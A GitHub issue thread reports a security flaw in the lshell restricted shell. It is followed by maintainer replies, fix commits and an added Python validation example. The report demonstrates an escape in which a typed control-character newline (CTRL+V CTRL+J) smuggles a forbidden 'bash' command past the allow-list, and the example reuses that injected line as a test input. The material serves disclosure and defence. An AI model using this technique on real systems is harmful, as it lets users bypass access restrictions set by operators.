SECURITY ISSUE: Escape possible using special keys #149

Closed
Snawoot opened this issue Aug 17, 2016 · 4 comments

@Snawoot

Snawoot commented Aug 17, 2016

Just type <CTRL+V><CTRL+J> after any allowed command and then type the desired restricted command:

```
vladislav@dt1:~$ getent passwd testuser
testuser:x:1001:1002:,,,:/home/testuser:/usr/bin/lshell
vladislav@dt1:~$ su - testuser
Password: 
You are in a limited shell.
Type '?' or 'help' to get the list of allowed commands
testuser:~$ ?
cd  clear  echo  exit  help  history  ll  lpath  ls  lsudo
testuser:~$ bash
*** forbidden command: bash
testuser:~$ echo<CTRL+V><CTRL+J>
bash

testuser@dt1:~$ which bash
/bin/bash
```

@Snawoot Snawoot changed the title SECURITY ISSUE: Escape possible by using special keys SECURITY ISSUE: Escape possible using special keys Aug 18, 2016
@ghantoos
Owner

Hi @Snawoot!

Thanks for reporting these major security issues. I am unfortunately away from my PC until tomorrow night. I'll do my best to work on this asap.

I also saw your Debian bug reports, as I am the Debian maintainer for lshell.

Cheers!

@ghantoos
Owner

@Snawoot can you confirm that this fixes the issue you reported? Thanks! :)

@Snawoot
Author

Snawoot commented Aug 22, 2016

@ghantoos Fix confirmed, thank you!

ghantoos pushed a commit that referenced this issue Aug 25, 2016
…loses #147, Closes #149)

Both issues #148 and #147 use the same vulnerability in the parser,
that ignored the quoted strings. Parsing only the rest of the line
for security issues. This is a major security bug.

This commit also corrects a previous omitted correction regarding the
control characters, that permitted to escape from lshell.

Thank you Proskurin Kirill (@Oloremo) and Vladislav Yarmak (@Snawoot)
for reporting this!!
@ghantoos
Owner

Reopening as issue is still there, using other control characters. See #148.

@ghantoos ghantoos reopened this Aug 25, 2016
ghantoos added a commit that referenced this issue Aug 25, 2016
Closes #148, Closes #147, Closes #149)

Both issues #148 and #147 use the same vulnerability in the parser,
that ignored the quoted strings. Parsing only the rest of the line
for security issues. This is a major security bug.

This commit also corrects a previous omitted correction regarding the
control characters, that permitted to escape from lshell.

Thank you Proskurin Kirill (@Oloremo) and Vladislav Yarmak (@Snawoot)
for reporting this!!
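
The input check this class of bug calls for, as an added example that is not part of the original thread and is not lshell's code or its fix: `first_word_check` is a hypothetical allow-list that validates only the first word, while `strict_check` refuses any line containing a control character before consulting the list. The allow-list is copied from the `?` output in the report; the function names and sample inputs are constructed, and the example assumes the accepted line is later handed to a shell, where a newline separates commands.

```python
import unicodedata

# Allowed commands as listed by '?' in the reported session.
ALLOWED = {"cd", "clear", "echo", "exit", "help", "history",
           "ll", "lpath", "ls", "lsudo"}


def first_word_check(line):
    """Hypothetical weak check: validates only the first word of the input."""
    words = line.split()
    return bool(words) and words[0] in ALLOWED


def control_chars(line):
    """Return (index, code point) for every control character (category Cc)."""
    return [(i, "U+%04X" % ord(ch)) for i, ch in enumerate(line)
            if unicodedata.category(ch) == "Cc"]


def strict_check(line):
    """Reject control characters first, then validate the command word.

    Returns (allowed, reason). Tab and DEL are category Cc and are rejected too.
    """
    found = control_chars(line)
    if found:
        return False, "control character(s) at %s" % found
    words = line.split()
    if not words:
        return False, "empty line"
    if words[0] not in ALLOWED:
        return False, "forbidden command: %s" % words[0]
    return True, "ok"


if __name__ == "__main__":
    # Constructed inputs: a plain allowed command, the forbidden command from
    # the report, and the line produced by typing echo<CTRL+V><CTRL+J>bash.
    samples = ["echo hello", "bash", "echo\nbash"]
    for line in samples:
        print(repr(line), first_word_check(line), strict_check(line))
```

Logging the rejected line with `repr()` keeps the embedded control character visible in the audit trail instead of letting it split the log entry.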